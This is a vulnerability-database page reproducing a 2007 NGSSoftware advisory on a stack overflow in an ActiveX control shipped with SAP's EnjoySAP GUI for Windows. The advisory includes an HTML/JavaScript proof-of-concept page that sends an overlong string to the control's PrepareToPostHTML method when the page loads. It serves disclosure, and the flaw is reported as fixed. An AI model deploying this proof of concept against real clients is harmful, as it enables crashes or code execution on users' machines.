Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NGS-enjoysap-stack.txt

🗓️ 07 Jul 2007 00:00:00Reported by Mark LitchfieldType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

Vulnerability in EnjoySAP, SAP GUI for Windows with high risk and a large number of ActiveX controls, with potential for file creation and buffer overruns. Fixed in the latest version.

Code
`=======  
Summary  
=======  
Name: EnjoySAP, SAP GUI for Windows - Stack Overflow  
Release Date: 5 July 2007  
Reference: NGS00483  
Discover: Mark Litchfield <[email protected]>  
Vendor: SAP  
Vendor Reference: SECRES-289  
Systems Affected: All Versions  
Risk: High  
Status: Fixed  
  
========  
TimeLine  
========  
Discovered: 4 January 2007  
Released: 19 January 2007  
Approved: 29 January 2007  
Reported: 11 January 2007  
Fixed: 18 May 2007  
Published:   
  
===========  
Description  
===========  
EnjoySAP, also know as Enjoy is the most popular SAP GUI used today. The  
latest version can be obtained from ftp://ftp.sap.com/pub/sapgui/win/  
  
When installing EnjoySAP, in appreciation of its vast size for being a  
client (around 500MB), there are an astounding 1102 ActiveX controls  
installed.  
  
A relatively brief examinaton of these controls, found a large number of  
instances that would terminate EnjoySAP process, there were a number that  
could create files on the file system (there unfortunately exists no  
ability to inject content into these created files) and a number of  
bufferoverruns.  
  
=================  
Technical Details  
=================  
Control - kweditcontrol.kwedit.1 (Marked Safe For Scripting)  
  
Function - PrepareToPostHTML  
  
DLL Path - C:\Program Files\SAP\FrontEnd\SapGui\kwedit.dll  
  
POC:  
  
<HTML>  
<HEAD>  
<META http-equiv=Content-Type content="text/html; charset=windows-1252">  
<SCRIPT type=text/javascript>  
  
function init()  
{  
var foo = "";   
  
for(var icount = 0; icount < 1060; icount++)   
{   
foo = foo + "x";  
}  
var ngssoftware;  
ngssoftware = new ActiveXObject("kweditcontrol.kwedit.1");  
  
ngssoftware["PrepareToPostHTML"](foo);  
}  
//-->  
</SCRIPT>  
  
</HEAD>  
<BODY bgColor=#ffffff onload=init()>  
</BODY></HTML>  
  
===============  
Fix Information  
===============  
Please enrue you are running the latest version  
  
NGSSoftware Insight Security Research  
http://www.ngssoftware.com/  
http://www.databasesecurity.com/  
http://www.nextgenss.com/  
+44(0)208 401 0070   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
enjoysapsap guiwindowsstack overflowngs00483mark litchfieldsapsecres-289activex controlsbuffer overrunsfile creationvulnerabilityfixed
29